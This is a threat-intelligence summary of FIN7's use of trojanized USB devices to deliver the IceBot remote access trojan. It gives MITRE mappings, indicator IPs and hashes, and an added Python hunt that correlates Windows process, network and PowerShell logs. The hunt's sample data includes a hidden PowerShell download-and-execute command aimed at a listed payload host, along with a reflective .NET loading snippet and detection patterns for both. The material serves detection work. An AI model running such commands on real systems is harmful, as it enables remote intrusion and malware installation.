Gemini Advisory analyzes FIN7’s use of trojanized USB devices (BadUSB) to deliver the IceBot Remote Access Trojan, enabling unauthorized remote access to victims’ networks. The report details the Arduino-based sketch used to infect USB devices, a network of payload hosts and C2 servers, and an exposed control panel showing infected systems. #FIN7 #IceBot #BadUSB #Lizar #Tirion #Diceloader #BastionSecure
Keypoints
- FIN7 used an Arduino sketch file called “sketch_jul31a.ino” to install malware on USB devices as part of BadUSB attacks.
- Trojanized USB devices load the IceBot Remote Access Trojan (RAT), resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.
- We identified 9 IP addresses that host FIN7’s malicious payloads and 3 FIN7 command-and-control (C2) servers, one of which contains a control panel for managing infected systems.
- The attack relies on keystroke injection: the trojanized device enumerates as a USB keyboard (HID), and Windows accepts typed input from any attached HID without prompting, the BadUSB/Rubber Ducky technique.
- The delivery chain opens the Run dialog to launch cmd.exe, which starts PowerShell to download and execute payloads from the payload-hosting IPs (e.g., 206.54.190.230).
- One of the IceBot C2 servers exposes a control panel listing infected systems and the C2 IPs they report to (e.g., 199.80.55.66, 207.246.92.213, 185.250.151.126).
MITRE Techniques
- [T1059.001] PowerShell – PowerShell commands download and execute the payloads; “powershell.exe -w h -command Invoke-Expression” runs the fetched script inline with a hidden window (-w h is short for -WindowStyle Hidden).
- [T1059.003] Windows Command Shell – Keystrokes injected by the sketch open the Run dialog and launch “cmd.exe”, which in turn starts the PowerShell stage.
- [T1027] Obfuscated/Compressed Files and Information – The PowerShell script decompresses data via DeflateStream to obtain a .NET assembly.
- [T1620] Reflective Loading – The .NET assembly is decoded, loaded, and executed in memory via Reflection.Assembly::Load.
- [T1071.001] Web Protocols – The RAT communicates with its C2 infrastructure over TCP 443; the control panel lists infected hosts and their C2 IPs (e.g., “The IP address of the C2 server is 185.250.151[.]126:443”).
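The techniques above map onto a small amount of host telemetry, so a hunt can be written against it. The following is an added example, not code from the Gemini Advisory report or from FIN7’s tooling: it correlates Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records with PowerShell script block logs (Event ID 4104) to reconstruct the Run dialog → cmd.exe → hidden PowerShell → in-memory .NET load chain and flag connections to the IPs named in this summary. All records, process GUIDs, and the download URL path are constructed placeholders; the only real values are the IP addresses listed on this page.

```python
"""Hunt for the FIN7 BadUSB delivery chain in Windows telemetry.

Added example, not code from the Gemini Advisory report. Records below are
constructed, modelled on Sysmon Event ID 1 (process create), Event ID 3
(network connect) and PowerShell script block logging (Event ID 4104).
"""
import re
from typing import Dict, Iterable, List, Set

# Infrastructure named in the report (payload hosts and C2 servers).
KNOWN_PAYLOAD_HOSTS = {"206.54.190.230", "138.124.180.127", "185.232.170.24"}
KNOWN_C2 = {"199.80.55.66", "207.246.92.213", "185.250.151.126"}

# Command-line and script patterns for each stage of the chain.
HIDDEN_WINDOW = re.compile(r"(?i)\s-w(?:indowstyle)?\s+h(?:idden)?\b")   # -w h / -WindowStyle Hidden
INVOKE_EXPRESSION = re.compile(r"(?i)\b(?:invoke-expression|iex)\b")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b")
INMEM_LOADER = re.compile(r"(?i)deflatestream|frombase64string|reflection\.assembly\]?::load")

Event = Dict[str, object]


def tag_process(ev: Event) -> Set[str]:
    """Stages of the chain visible in one process-creation record."""
    tags: Set[str] = set()
    image = str(ev.get("Image", "")).lower()
    parent = str(ev.get("ParentImage", "")).lower()
    cmd = str(ev.get("CommandLine", ""))
    if image.endswith("\\cmd.exe") and parent.endswith("\\explorer.exe"):
        tags.add("run_dialog_cmd")  # the Run dialog launches children under explorer.exe
    if image.endswith("\\powershell.exe"):
        if parent.endswith("\\cmd.exe"):
            tags.add("cmd_spawns_powershell")
        if HIDDEN_WINDOW.search(cmd):
            tags.add("hidden_window")
        if INVOKE_EXPRESSION.search(cmd):
            tags.add("invoke_expression")
        if DOWNLOAD_CRADLE.search(cmd):
            tags.add("download_cradle")
    return tags


def tag_network(ev: Event) -> Set[str]:
    dst = str(ev.get("DestinationIp", ""))
    tags: Set[str] = set()
    if dst in KNOWN_PAYLOAD_HOSTS:
        tags.add("known_payload_host")
    if dst in KNOWN_C2:
        tags.add("known_c2")
    return tags


def tag_scriptblock(ev: Event) -> Set[str]:
    """Decompression and Reflection.Assembly::Load run inside the fetched script,
    so they appear in script block logs, not on the process command line."""
    return {"inmemory_dotnet_load"} if INMEM_LOADER.search(str(ev.get("ScriptBlockText", ""))) else set()


def hunt(events: Iterable[Event]) -> List[Event]:
    """One finding per PowerShell process, with tags from its own record, its
    parent chain (via ParentProcessGuid), its connections and its script blocks."""
    evs = list(events)
    procs = {e["ProcessGuid"]: e for e in evs if e["EventID"] == 1}
    net: Dict[object, List[Event]] = {}
    blocks: Dict[object, List[Event]] = {}
    for e in evs:
        if e["EventID"] == 3:
            net.setdefault(e["ProcessGuid"], []).append(e)
        elif e["EventID"] == 4104:
            blocks.setdefault(e["ProcessId"], []).append(e)  # 4104 carries a PID, not a GUID
    findings: List[Event] = []
    for guid, ev in procs.items():
        if not str(ev["Image"]).lower().endswith("\\powershell.exe"):
            continue
        tags = tag_process(ev)
        pg, depth = ev.get("ParentProcessGuid"), 0
        while pg in procs and depth < 4:  # bounded walk up to the Run-dialog cmd.exe
            tags |= tag_process(procs[pg])
            pg, depth = procs[pg].get("ParentProcessGuid"), depth + 1
        for n in net.get(guid, []):
            tags |= tag_network(n)
        for b in blocks.get(ev["ProcessId"], []):
            tags |= tag_scriptblock(b)
        if not tags:
            continue
        high = {"hidden_window", "invoke_expression"} <= tags or bool(
            tags & {"inmemory_dotnet_load", "known_c2", "known_payload_host"})
        findings.append({"ProcessGuid": guid, "severity": "high" if high else "low", "tags": sorted(tags)})
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Event] = [  # constructed records, not real telemetry
    {"EventID": 1, "ProcessGuid": "{p-explorer}", "ProcessId": 1200, "ParentProcessGuid": "{p-userinit}",
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessGuid": "{p-cmd}", "ProcessId": 4410, "ParentProcessGuid": "{p-explorer}",  # injected Win+R, cmd.exe
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessGuid": "{p-ps}", "ProcessId": 4522, "ParentProcessGuid": "{p-cmd}",  # hidden download cradle
     "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -w h -command Invoke-Expression "
                    "(New-Object Net.WebClient).DownloadString('http://206.54.190.230/wis.txt')"},  # path is a placeholder
    {"EventID": 3, "ProcessGuid": "{p-ps}", "Image": PS, "DestinationIp": "206.54.190.230", "DestinationPort": 80},
    {"EventID": 4104, "ProcessId": 4522, "ScriptBlockText":  # fetched script: decode, inflate, reflective load
     "$b=[Convert]::FromBase64String($d);$s=New-Object IO.Compression.DeflateStream(...);"
     "[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,$null)"},
    {"EventID": 3, "ProcessGuid": "{p-ps}", "Image": PS, "DestinationIp": "185.250.151.126", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{p-cmd2}", "ProcessId": 5001, "ParentProcessGuid": "{p-explorer}",  # benign admin use
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessGuid": "{p-ps2}", "ProcessId": 5010, "ParentProcessGuid": "{p-cmd2}",
     "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell.exe -command Get-Service Spooler"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"], f["ProcessGuid"], ", ".join(f["tags"]))
```

On the constructed sample the infected chain scores high with all eight tags, while the admin who opened cmd from the Run dialog and ran a visible PowerShell command scores low on process lineage alone. The 4104 correlation matters because the DeflateStream and Reflection.Assembly::Load steps never reach the process command line; without script block logging enabled, that stage is invisible to a process-creation-only hunt.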
Indicators of Compromise
- [IP Address] IPs hosting payloads/C2 – 138.124.180.127, 185.232.170.24, and 7 more IPs (per the article’s table of hosts and C2 servers)
- [SHA-256] File hashes – sketch_jul31a.ino: f778dccfe13b8597a0a9cbb61a204c03f8e166d7f7d5a21dfcf03d56bd2505c3, wis.ps1: 136095f5f529a891eabd8e04693c182f0701716fe051fa04825b5d2e0c85d1ae, .NET assembly: 6a3912016f3b41c8cb67a2bc3a6fb2597065d065a809f33288fe838693b7f9a0, Shellcode: 0a23ad00d0c62dccae0a759ad4853cd514abd176cfa85ba2665e30f7bdc8bcc0, RAT: 09189108547ebf046c47f01f4645667e6816a126355ee963d5ad7b91167e4290
- [File] Files involved – sketch_jul31a.ino, wis.ps1, wis.txt, plus the decoded .NET assembly, shellcode, and RAT, which are identified by the hashes above
Read more: https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/